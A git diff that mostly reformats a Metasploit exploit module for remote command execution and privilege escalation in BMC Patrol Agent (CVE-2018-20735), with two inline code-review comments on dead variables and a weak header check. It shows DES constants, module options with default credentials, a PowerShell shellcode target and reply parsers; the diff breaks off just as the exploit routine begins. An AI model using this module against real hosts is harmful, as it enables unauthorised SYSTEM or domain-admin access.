diff --git a/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb b/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
index aa63ba38f6..bd164b1c56 100644
--- a/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
+++ b/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
@@ -9,135 +9,140 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell - @deflater = $nil - @inflater = $nil + @deflater = nil + @inflater = nil + + SBOXES = [ + 0x20022000, 0x20000000, 0x0, 0x20022000, 0x0, 0x20022000, 0x20000000, 0x0, 0x20022000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x0, 0x20000000, 0x20000000, 0x0, + 0x22000, 0x20022000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x22000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x0, 0x0, 0x20022000, 0x22000, + 0x20000000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x22000, + 0x20022000, 0x0, 0x20022000, 0x0, 0x0, 0x20000000, 0x20022000, 0x20022000, 0x20000000, + 0x22000, 0x0, 0x22000, 0x20000000, 0x0, 0x20000000, 0x0, 0x22000, 0x20022000, 0x0, + 0x20000000, 0x22000, 0x20022000, 0x802, 0x2, 0x8000800, 0x8000802, 0x800, 0x8000002, + 0x8000002, 0x8000800, 0x8000002, 0x802, 0x802, 0x8000000, 0x8000800, 0x800, + 0x0, 0x8000002, 0x2, 0x8000000, 0x800, 0x2, 0x8000802, 0x802, 0x8000000, 0x800, 0x8000000, + 0x0, 0x2, 0x8000802, 0x0, 0x8000800, 0x8000802, 0x0, 0x0, 0x8000802, 0x800, 0x8000002, + 0x802, 0x2, 0x8000000, 0x800, 0x8000802, 0x0, 0x2, 0x8000800, 0x8000002, 0x8000000, + 0x8000800, 0x802, 0x8000802, 0x2, 0x802, 0x8000800, 0x800, 0x8000000, 0x8000002, + 0x0, 0x2, 0x800, 0x8000800, 0x802, 0x8000000, 0x8000802, 0x0, 0x8000002, 0x2200004, + 0x0, 0x2200000, 0x0, 0x4, 0x2200004, 0x2200000, 0x2200000, 0x2200000, 0x4, 0x4, 0x2200000, + 0x4, 0x2200000, 0x0, 0x4, 0x0, 0x2200004, 0x4, 0x2200000, 0x2200004, 0x0, 0x0, 0x4, 0x2200004, + 0x2200004, 0x2200000, 0x4, 0x0, 0x0, 0x2200004, 0x2200004, 0x4, 0x2200000, 0x2200000, + 0x2200004, 0x2200004, 0x4, 0x4, 0x0, 0x0, 0x2200004, 0x0, 0x4, 0x2200000, 0x0, 0x2200004, + 0x2200004, 0x2200000, 0x2200000, 0x0, 0x4, 0x4, 0x2200004, 0x2200000, 0x0, 0x4, 0x0, + 0x2200004, 0x2200000, 0x2200004, 0x4, 0x0, 0x2200000, 0x1100004, 0x0, 0x4, 0x1100004, + 0x1100000, 0x0, 0x1100000, 0x4, 0x0, 
0x1100004, 0x0, 0x1100000, 0x4, 0x1100004, 0x1100004, + 0x0, 0x4, 0x1100000, 0x1100004, 0x0, 0x4, 0x1100000, 0x0, 0x4, 0x1100000, 0x4, 0x1100004, + 0x1100000, 0x1100000, 0x4, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100000, 0x4, 0x1100004, + 0x4, 0x1100000, 0x0, 0x1100000, 0x0, 0x4, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100000, + 0x1100004, 0x0, 0x0, 0x1100000, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100004, 0x4, 0x0, + 0x1100000, 0x1100000, 0x0, 0x1100004, 0x4, 0x0, 0x10000400, 0x400, 0x400, 0x10000000, + 0x0, 0x400, 0x10000400, 0x400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x400, + 0x0, 0x10000000, 0x0, 0x10000000, 0x10000400, 0x400, 0x400, 0x10000400, 0x10000000, + 0x0, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x10000400, 0x0, 0x0, 0x10000400, + 0x10000400, 0x400, 0x0, 0x10000000, 0x400, 0x10000000, 0x10000000, 0x400, 0x0, + 0x10000400, 0x10000400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x0, 0x10000400, + 0x0, 0x0, 0x10000400, 0x10000000, 0x400, 0x400, 0x10000400, 0x400, 0x0, 0x10000000, + 0x400, 0x0, 0x10000400, 0x400, 0x10000000, 0x4011000, 0x11001, 0x0, 0x4011000, + 0x4000001, 0x11000, 0x4011000, 0x1, 0x11000, 0x1, 0x11001, 0x4000000, 0x4011001, + 0x4000000, 0x4000000, 0x4011001, 0x0, 0x4000001, 0x11001, 0x0, 0x4000000, 0x4011001, + 0x1, 0x4011000, 0x4011001, 0x11000, 0x4000001, 0x11001, 0x1, 0x0, 0x11000, 0x4000001, + 0x11001, 0x0, 0x4000000, 0x1, 0x4000000, 0x4000001, 0x11001, 0x4011000, 0x0, 0x11001, + 0x1, 0x4011001, 0x4000001, 0x11000, 0x4011001, 0x4000000, 0x4000001, 0x4011000, + 0x11000, 0x4011001, 0x1, 0x11000, 0x4011000, 0x1, 0x11000, 0x0, 0x4011001, 0x4000000, + 0x4011000, 0x4000001, 0x0, 0x11001, 0x40002, 0x40000, 0x2, 0x40002, 0x0, 0x0, 0x40002, + 0x2, 0x40000, 0x2, 0x0, 0x40002, 0x2, 0x40002, 0x0, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40000, + 0x40002, 0x0, 0x40000, 0x40002, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40002, 0x0, 0x2, 0x40002, + 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x0, 0x40002, 0x0, 0x40000, 0x2, 0x0, 0x2, 0x40000, 0x40000, + 0x0, 0x40002, 0x40002, 
0x0, 0x40002, 0x2, 0x40000, 0x40002, 0x2, 0x40000, 0x0, 0x40002, + 0x40002, 0x0, 0x2, 0x40000, 0x20000110, 0x40000, 0x20000000, 0x20040110, 0x0, 0x40110, + 0x20040000, 0x20000110, 0x40110, 0x20040000, 0x40000, 0x20000000, 0x20040000, + 0x20000110, 0x110, 0x40000, 0x20040110, 0x110, 0x0, 0x20000000, 0x110, 0x20040000, + 0x40110, 0x0, 0x20000000, 0x0, 0x20000110, 0x40110, 0x40000, 0x20040110, 0x20040110, + 0x110, 0x20040110, 0x20000000, 0x110, 0x20040000, 0x110, 0x40000, 0x20000000, + 0x40110, 0x20040000, 0x0, 0x0, 0x20000110, 0x0, 0x20040110, 0x40110, 0x0, 0x40000, + 0x20040110, 0x20000110, 0x110, 0x20040110, 0x20000000, 0x40000, 0x20000110, + 0x20000110, 0x110, 0x40110, 0x20040000, 0x20000000, 0x40000, 0x20040000, 0x40110, + 0x0, 0x4000000, 0x11000, 0x4011008, 0x4000008, 0x11000, 0x4011008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x4011000, 0x11008, 0x4000008, 0x4011000, 0x0, 0x4011000, 0x0, + 0x4000008, 0x11008, 0x11000, 0x4011008, 0x0, 0x8, 0x8, 0x11008, 0x4011008, 0x4000008, + 0x4000000, 0x11000, 0x11008, 0x4011000, 0x4011000, 0x11008, 0x4000008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x11000, 0x0, 0x4011000, 0x4011008, 0x0, 0x4011008, 0x0, 0x11000, + 0x4000008, 0x11008, 0x11000, 0x0, 0x4011008, 0x4000008, 0x4011000, 0x11008, 0x4000000, + 0x4011000, 0x4000008, 0x11000, 0x11008, 0x8, 0x4011008, 0x4000000, 0x8, 0x22000, + 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x110, 0x110, + 0x0, 0x80000, 0x110, 0x80000, 0x80110, 0x0, 0x80110, 0x80110, 0x80000, 0x0, 0x80000, + 0x110, 0x0, 0x80110, 0x0, 0x80110, 0x110, 0x0, 0x80000, 0x110, 0x80000, 0x110, 0x80110, + 0x0, 0x0, 0x80110, 0x110, 
0x80000, 0x80110, 0x80000, 0x80110, 0x0, 0x80000, 0x80110, + 0x80000, 0x110, 0x0, 0x80000, 0x0, 0x80000, 0x110, 0x0, 0x110, 0x80110, 0x80000, 0x110, + 0x80110, 0x80000, 0x0, 0x80110, 0x110, 0x0, 0x80110, 0x0, 0x80000, 0x110, 0x80110, + 0x80000, 0x0, 0x80110, 0x110, 0x110, 0x2200000, 0x8, 0x0, 0x2200008, 0x8, 0x0, 0x2200000, + 0x8, 0x0, 0x2200008, 0x8, 0x2200000, 0x2200000, 0x2200000, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200008, 0x0, 0x0, 0x0, 0x2200008, 0x2200008, 0x2200008, 0x2200008, 0x2200000, + 0x0, 0x0, 0x8, 0x8, 0x2200000, 0x0, 0x2200000, 0x2200000, 0x8, 0x2200008, 0x8, 0x0, 0x2200000, + 0x2200000, 0x0, 0x2200008, 0x8, 0x8, 0x2200008, 0x8, 0x0, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200000, 0x2200008, 0x8, 0x0, 0x0, 0x2200000, 0x2200000, 0x2200008, 0x2200008, + 0x0, 0x0, 0x2200008, 0x1100000, 0x800, 0x800, 0x1, 0x1100801, 0x1100001, 0x1100800, + 0x0, 0x0, 0x801, 0x801, 0x1100000, 0x1, 0x1100800, 0x1100000, 0x801, 0x801, 0x1100000, + 0x1100001, 0x1100801, 0x0, 0x800, 0x1, 0x1100800, 0x1100001, 0x1100801, 0x1100800, + 0x1, 0x1100801, 0x1100001, 0x800, 0x0, 0x1100801, 0x1100000, 0x1100001, 0x801, + 0x1100000, 0x800, 0x0, 0x1100001, 0x801, 0x1100801, 0x1100800, 0x0, 0x800, 0x1, 0x1, + 0x800, 0x0, 0x801, 0x800, 0x1100800, 0x801, 0x1100000, 0x1100801, 0x0, 0x1100800, + 0x1, 0x1100001, 0x1100801, 0x1, 0x1100800, 0x1100000, 0x1100001, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, 0x10000400, 0x10000000, 0x400, + 0x10000000, 0x400, 0x400, 0x10000000, 0x10000400, 0x0, 0x10000000, 0x10000400, + 0x0, 0x400, 0x10000400, 0x0, 0x10000400, 0x10000000, 0x400, 0x10000000, 0x10000000, + 0x10000400, 0x0, 0x400, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x0, 0x10000400, 0x10000000, 0x400, + 0x0, 0x10000400, 0x400, 0x0, 0x10000000, 0x0, 0x10000400, 0x400, 0x400, 0x10000000, + 0x10000000, 0x10000400, 0x10000400, 0x400, 0x400, 0x10000000, 0x220, 0x8000000, + 0x8000220, 0x0, 0x8000000, 0x220, 
0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, + 0x8000220, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, 0x220, 0x8000000, 0x8000220, + 0x220, 0x0, 0x8000000, 0x0, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000000, 0x220, + 0x0, 0x8000000, 0x220, 0x8000220, 0x8000220, 0x0, 0x0, 0x8000000, 0x220, 0x8000220, + 0x8000000, 0x220, 0x8000000, 0x220, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x8000220, 0x0, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x80220, 0x80220, 0x0, 0x0, 0x80000, 0x220, 0x80220, 0x80220, + 0x0, 0x80000, 0x220, 0x0, 0x220, 0x80000, 0x80000, 0x80220, 0x0, 0x220, 0x220, 0x80000, + 0x80220, 0x80000, 0x0, 0x220, 0x80000, 0x220, 0x80000, 0x80220, 0x220, 0x0, 0x80220, + 0x0, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x80000, 0x0, 0x220, 0x80220, 0x80000, 0x80000, + 0x220, 0x80220, 0x0, 0x220, 0x80000, 0x80220, 0x220, 0x80220, 0x80000, 0x220, 0x0, + 0x80000, 0x80220, 0x0, 0x80220, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x220 + ].freeze - SBOXES = [ 0x20022000,0x20000000,0x0,0x20022000,0x0,0x20022000,0x20000000,0x0,0x20022000, - 0x20022000,0x20000000,0x22000,0x22000,0x0,0x0,0x20000000,0x20000000,0x0, - 0x22000,0x20022000,0x20022000,0x20000000,0x22000,0x22000,0x0,0x22000, - 0x20022000,0x20000000,0x22000,0x22000,0x20000000,0x0,0x0,0x20022000,0x22000, - 0x20000000,0x20022000,0x20000000,0x22000,0x22000,0x20000000,0x22000, - 0x20022000,0x0,0x20022000,0x0,0x0,0x20000000,0x20022000,0x20022000,0x20000000, - 0x22000,0x0,0x22000,0x20000000,0x0,0x20000000,0x0,0x22000,0x20022000,0x0, - 0x20000000,0x22000,0x20022000,0x802,0x2,0x8000800,0x8000802,0x800,0x8000002, - 0x8000002,0x8000800,0x8000002,0x802,0x802,0x8000000,0x8000800,0x800, - 0x0,0x8000002,0x2,0x8000000,0x800,0x2,0x8000802,0x802,0x8000000,0x800,0x8000000, - 0x0,0x2,0x8000802,0x0,0x8000800,0x8000802,0x0,0x0,0x8000802,0x800,0x8000002, - 0x802,0x2,0x8000000,0x800,0x8000802,0x0,0x2,0x8000800,0x8000002,0x8000000, - 
0x8000800,0x802,0x8000802,0x2,0x802,0x8000800,0x800,0x8000000,0x8000002, - 0x0,0x2,0x800,0x8000800,0x802,0x8000000,0x8000802,0x0,0x8000002,0x2200004, - 0x0,0x2200000,0x0,0x4,0x2200004,0x2200000,0x2200000,0x2200000,0x4,0x4,0x2200000, - 0x4,0x2200000,0x0,0x4,0x0,0x2200004,0x4,0x2200000,0x2200004,0x0,0x0,0x4,0x2200004, - 0x2200004,0x2200000,0x4,0x0,0x0,0x2200004,0x2200004,0x4,0x2200000,0x2200000, - 0x2200004,0x2200004,0x4,0x4,0x0,0x0,0x2200004,0x0,0x4,0x2200000,0x0,0x2200004, - 0x2200004,0x2200000,0x2200000,0x0,0x4,0x4,0x2200004,0x2200000,0x0,0x4,0x0, - 0x2200004,0x2200000,0x2200004,0x4,0x0,0x2200000,0x1100004,0x0,0x4,0x1100004, - 0x1100000,0x0,0x1100000,0x4,0x0,0x1100004,0x0,0x1100000,0x4,0x1100004,0x1100004, - 0x0,0x4,0x1100000,0x1100004,0x0,0x4,0x1100000,0x0,0x4,0x1100000,0x4,0x1100004, - 0x1100000,0x1100000,0x4,0x0,0x1100004,0x4,0x1100004,0x1100000,0x4,0x1100004, - 0x4,0x1100000,0x0,0x1100000,0x0,0x4,0x1100004,0x0,0x1100000,0x4,0x1100000, - 0x1100004,0x0,0x0,0x1100000,0x0,0x1100004,0x4,0x1100004,0x1100004,0x4,0x0, - 0x1100000,0x1100000,0x0,0x1100004,0x4,0x0,0x10000400,0x400,0x400,0x10000000, - 0x0,0x400,0x10000400,0x400,0x10000000,0x10000000,0x0,0x10000400,0x400, - 0x0,0x10000000,0x0,0x10000000,0x10000400,0x400,0x400,0x10000400,0x10000000, - 0x0,0x10000000,0x400,0x10000400,0x10000000,0x10000400,0x0,0x0,0x10000400, - 0x10000400,0x400,0x0,0x10000000,0x400,0x10000000,0x10000000,0x400,0x0, - 0x10000400,0x10000400,0x10000000,0x10000000,0x0,0x10000400,0x0,0x10000400, - 0x0,0x0,0x10000400,0x10000000,0x400,0x400,0x10000400,0x400,0x0,0x10000000, - 0x400,0x0,0x10000400,0x400,0x10000000,0x4011000,0x11001,0x0,0x4011000, - 0x4000001,0x11000,0x4011000,0x1,0x11000,0x1,0x11001,0x4000000,0x4011001, - 0x4000000,0x4000000,0x4011001,0x0,0x4000001,0x11001,0x0,0x4000000,0x4011001, - 0x1,0x4011000,0x4011001,0x11000,0x4000001,0x11001,0x1,0x0,0x11000,0x4000001, - 0x11001,0x0,0x4000000,0x1,0x4000000,0x4000001,0x11001,0x4011000,0x0,0x11001, - 
0x1,0x4011001,0x4000001,0x11000,0x4011001,0x4000000,0x4000001,0x4011000, - 0x11000,0x4011001,0x1,0x11000,0x4011000,0x1,0x11000,0x0,0x4011001,0x4000000, - 0x4011000,0x4000001,0x0,0x11001,0x40002,0x40000,0x2,0x40002,0x0,0x0,0x40002, - 0x2,0x40000,0x2,0x0,0x40002,0x2,0x40002,0x0,0x0,0x2,0x40000,0x40000,0x2,0x40000, - 0x40002,0x0,0x40000,0x40002,0x0,0x2,0x40000,0x40000,0x2,0x40002,0x0,0x2,0x40002, - 0x0,0x2,0x40000,0x40000,0x2,0x0,0x40002,0x0,0x40000,0x2,0x0,0x2,0x40000,0x40000, - 0x0,0x40002,0x40002,0x0,0x40002,0x2,0x40000,0x40002,0x2,0x40000,0x0,0x40002, - 0x40002,0x0,0x2,0x40000,0x20000110,0x40000,0x20000000,0x20040110,0x0,0x40110, - 0x20040000,0x20000110,0x40110,0x20040000,0x40000,0x20000000,0x20040000, - 0x20000110,0x110,0x40000,0x20040110,0x110,0x0,0x20000000,0x110,0x20040000, - 0x40110,0x0,0x20000000,0x0,0x20000110,0x40110,0x40000,0x20040110,0x20040110, - 0x110,0x20040110,0x20000000,0x110,0x20040000,0x110,0x40000,0x20000000, - 0x40110,0x20040000,0x0,0x0,0x20000110,0x0,0x20040110,0x40110,0x0,0x40000, - 0x20040110,0x20000110,0x110,0x20040110,0x20000000,0x40000,0x20000110, - 0x20000110,0x110,0x40110,0x20040000,0x20000000,0x40000,0x20040000,0x40110, - 0x0,0x4000000,0x11000,0x4011008,0x4000008,0x11000,0x4011008,0x4000000, - 0x4000000,0x8,0x8,0x4011000,0x11008,0x4000008,0x4011000,0x0,0x4011000,0x0, - 0x4000008,0x11008,0x11000,0x4011008,0x0,0x8,0x8,0x11008,0x4011008,0x4000008, - 0x4000000,0x11000,0x11008,0x4011000,0x4011000,0x11008,0x4000008,0x4000000, - 0x4000000,0x8,0x8,0x11000,0x0,0x4011000,0x4011008,0x0,0x4011008,0x0,0x11000, - 0x4000008,0x11008,0x11000,0x0,0x4011008,0x4000008,0x4011000,0x11008,0x4000000, - 0x4011000,0x4000008,0x11000,0x11008,0x8,0x4011008,0x4000000,0x8,0x22000, - 0x0,0x0,0x22000,0x22000,0x22000,0x0,0x22000,0x0,0x0,0x22000,0x0,0x22000,0x22000, - 0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x22000,0x22000, - 0x0,0x22000,0x0,0x0,0x22000,0x22000,0x22000,0x0,0x22000,0x0,0x0,0x22000,0x22000, - 
0x22000,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x22000, - 0x22000,0x0,0x0,0x0,0x22000,0x22000,0x0,0x0,0x0,0x22000,0x22000,0x110,0x110, - 0x0,0x80000,0x110,0x80000,0x80110,0x0,0x80110,0x80110,0x80000,0x0,0x80000, - 0x110,0x0,0x80110,0x0,0x80110,0x110,0x0,0x80000,0x110,0x80000,0x110,0x80110, - 0x0,0x0,0x80110,0x110,0x80000,0x80110,0x80000,0x80110,0x0,0x80000,0x80110, - 0x80000,0x110,0x0,0x80000,0x0,0x80000,0x110,0x0,0x110,0x80110,0x80000,0x110, - 0x80110,0x80000,0x0,0x80110,0x110,0x0,0x80110,0x0,0x80000,0x110,0x80110, - 0x80000,0x0,0x80110,0x110,0x110,0x2200000,0x8,0x0,0x2200008,0x8,0x0,0x2200000, - 0x8,0x0,0x2200008,0x8,0x2200000,0x2200000,0x2200000,0x2200008,0x8,0x8,0x2200000, - 0x2200008,0x0,0x0,0x0,0x2200008,0x2200008,0x2200008,0x2200008,0x2200000, - 0x0,0x0,0x8,0x8,0x2200000,0x0,0x2200000,0x2200000,0x8,0x2200008,0x8,0x0,0x2200000, - 0x2200000,0x0,0x2200008,0x8,0x8,0x2200008,0x8,0x0,0x2200008,0x8,0x8,0x2200000, - 0x2200000,0x2200008,0x8,0x0,0x0,0x2200000,0x2200000,0x2200008,0x2200008, - 0x0,0x0,0x2200008,0x1100000,0x800,0x800,0x1,0x1100801,0x1100001,0x1100800, - 0x0,0x0,0x801,0x801,0x1100000,0x1,0x1100800,0x1100000,0x801,0x801,0x1100000, - 0x1100001,0x1100801,0x0,0x800,0x1,0x1100800,0x1100001,0x1100801,0x1100800, - 0x1,0x1100801,0x1100001,0x800,0x0,0x1100801,0x1100000,0x1100001,0x801, - 0x1100000,0x800,0x0,0x1100001,0x801,0x1100801,0x1100800,0x0,0x800,0x1,0x1, - 0x800,0x0,0x801,0x800,0x1100800,0x801,0x1100000,0x1100801,0x0,0x1100800, - 0x1,0x1100001,0x1100801,0x1,0x1100800,0x1100000,0x1100001,0x0,0x0,0x400, - 0x10000400,0x10000400,0x10000000,0x0,0x0,0x400,0x10000400,0x10000000,0x400, - 0x10000000,0x400,0x400,0x10000000,0x10000400,0x0,0x10000000,0x10000400, - 0x0,0x400,0x10000400,0x0,0x10000400,0x10000000,0x400,0x10000000,0x10000000, - 0x10000400,0x0,0x400,0x10000000,0x400,0x10000400,0x10000000,0x0,0x0,0x400, - 0x10000400,0x10000400,0x10000000,0x0,0x0,0x0,0x10000400,0x10000000,0x400, - 
0x0,0x10000400,0x400,0x0,0x10000000,0x0,0x10000400,0x400,0x400,0x10000000, - 0x10000000,0x10000400,0x10000400,0x400,0x400,0x10000000,0x220,0x8000000, - 0x8000220,0x0,0x8000000,0x220,0x0,0x8000220,0x220,0x0,0x8000000,0x8000220, - 0x8000220,0x8000220,0x220,0x0,0x8000000,0x8000220,0x220,0x8000000,0x8000220, - 0x220,0x0,0x8000000,0x0,0x0,0x8000220,0x220,0x0,0x8000000,0x8000000,0x220, - 0x0,0x8000000,0x220,0x8000220,0x8000220,0x0,0x0,0x8000000,0x220,0x8000220, - 0x8000000,0x220,0x8000000,0x220,0x220,0x8000000,0x8000220,0x0,0x0,0x220, - 0x8000000,0x8000220,0x8000220,0x0,0x220,0x8000000,0x8000220,0x0,0x0,0x220, - 0x8000000,0x8000220,0x80220,0x80220,0x0,0x0,0x80000,0x220,0x80220,0x80220, - 0x0,0x80000,0x220,0x0,0x220,0x80000,0x80000,0x80220,0x0,0x220,0x220,0x80000, - 0x80220,0x80000,0x0,0x220,0x80000,0x220,0x80000,0x80220,0x220,0x0,0x80220, - 0x0,0x220,0x0,0x80000,0x80220,0x0,0x80000,0x0,0x220,0x80220,0x80000,0x80000, - 0x220,0x80220,0x0,0x220,0x80000,0x80220,0x220,0x80220,0x80000,0x220,0x0, - 0x80000,0x80220,0x0,0x80220,0x220,0x0,0x80000,0x80220,0x0,0x220] PC1 = "\x38\x30\x28\x20\x18\x10\x8\x0\x39\x31\x29\x21\x19\x11\x9"\ "\x1\x3A\x32\x2A\x22\x1A\x12\x0A\x2\x3B\x33\x2B\x23\x3E\x36"\ "\x2E\x26\x1E\x16\x0E\x6\x3D\x35\x2D\x25\x1D\x15\x0D\x5\x3C"\ - "\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0" + "\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0".freeze + PC2 = "\x0D\x10\x0A\x17\x0\x4\x2\x1B\x0E\x5\x14\x9\x16\x12\x0B\x3"\ "\x19\x7\x0F\x6\x1A\x13\x0C\x1\x28\x33\x1E\x24\x2E\x36\x1D"\ "\x27\x32\x2C\x20\x2F\x2B\x30\x26\x37\x21\x34\x2D\x29\x31"\ - "\x23\x1C\x1F" - SBOX_BYTE_ORDER = [ 1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, - 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, - 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, - 0x40000000, 0x80000000 ] + "\x23\x1C\x1F".freeze - ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1" - 
INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e" - INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8" - #@des_keysch_0 = $nil - #@des_keysch_1 = $nil + SBOX_BYTE_ORDER = [ + 1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, + 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, + 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, + 0x40000000, 0x80000000 + ].freeze + + ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1".freeze + INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e".freeze + INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8".freeze DES_ENCRYPT = 0 - def initialize(info={}) + def initialize(info = {}) super(update_info(info, 'Name' => 'BMC Patrol Agent Privilege Escalation Cmd Execution', - 'Description' => %q{ + 'Description' => %q( This module leverages the remote command execution feature provided by the BMC Patrol Agent software. It can also be used to escalate privileges on Windows hosts as the software runs as SYSTEM but only verfies that the password @@ -146,19 +151,19 @@ class MetasploitModule < Msf::Exploit::Remote admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses powershell to execute the payload. The powershell version tends to timeout on the first run so it may take multiple tries. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ - 'b0yd', # @rwincey / Vulnerability Discovery and MSF module author + 'b0yd' # @rwincey / Vulnerability Discovery and MSF module author ], 'References' => [ ['CVE', '2018-20735'], ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/'] ], - 'Platform' => ['win','linux'], - 'Targets' => + 'Platform' => ['win', 'linux'], + 'Targets' => [ [ 'Windows Powershell Injected Shellcode', { 
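Review bot: The `@deflater = nil` and `@inflater = nil` lines at the top of the hunk sit in the class body, so they create class-level instance variables that are distinct from the `@deflater`/`@inflater` the instance assigns in `exploit`, and nothing reads them; fixing `$nil` to `nil` keeps two dead declarations that could simply be deleted. If they are meant as documentation of the instance state, a comment such as `# Zlib streams for the Patrol message framing; created in exploit` on the `exploit` assignments says that more honestly. The trailing context of this hunk also still carries the typo "verfies" in the module description, which the delimiter change in the next hunk (`@@ -146`) could have picked up.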
@@ -175,18 +180,20 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'DefaultTarget' => 0, 'DefaultOptions' => { - 'DisablePayloadHandler' => true, + 'DisablePayloadHandler' => true }, 'DisclosureDate' => 'Jan 17 2019')) - register_options([ + register_options( + [ Opt::RPORT(3181), - OptString.new('USER', [ true, 'local or domain user to authenticate with patrol', 'patrol' ]), - OptString.new('PASSWORD', [ true, 'password to authenticate with patrol', 'password' ]), - OptString.new('CMD', [ false, 'command to run on the target. If this option is specified the payload will be ignored.' ]) - ]) + OptString.new('USER', [true, 'local or domain user to authenticate with patrol', 'patrol']), + OptString.new('PASSWORD', [true, 'password to authenticate with patrol', 'password']), + OptString.new('CMD', [false, 'command to run on the target. If this option is specified the payload will be ignored.']) + ] + ) - end + end def cleanup disconnect @@ -196,12 +203,12 @@ class MetasploitModule < Msf::Exploit::Remote super end - def get_target_os( srv_info_msg ) + def get_target_os(srv_info_msg) lines = srv_info_msg.split("\n") - fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}" + fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}" - os = $nil - ver = $nil + os = nil + ver = nil lines[2..-2].each do |i| val = i.split("=") if val.length == 2 
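Review bot: The header check in get_target_os rejects a reply only when all three conditions fail together, so a message whose first line is not `MS` still passes as long as the braces are present; replacing `and` with `&&` preserves that semantics but the validation intended here is `fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" || lines[1] != "{" || lines[-1] != "}"`. The same `&&` chain appears in get_cmd_output in the next hunk (`@@ -212`) and needs the same change. get_target_os continues past the end of this hunk.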
@@ -212,62 +219,62 @@ class MetasploitModule < Msf::Exploit::Remote end end end - [os,ver] + [os, ver] end - def get_cmd_output( cmd_output_msg ) + def get_cmd_output(cmd_output_msg) lines = cmd_output_msg.split("\n") - fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}" + fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}" - #Parse out command results + # Parse out command results idx_start = cmd_output_msg.index("Result\x00") idx_end = cmd_output_msg.index("RemPsl_user") - output = cmd_output_msg[idx_start+7..idx_end-1] + output = cmd_output_msg[idx_start + 7..idx_end - 1] output end def exploit - #Manually start 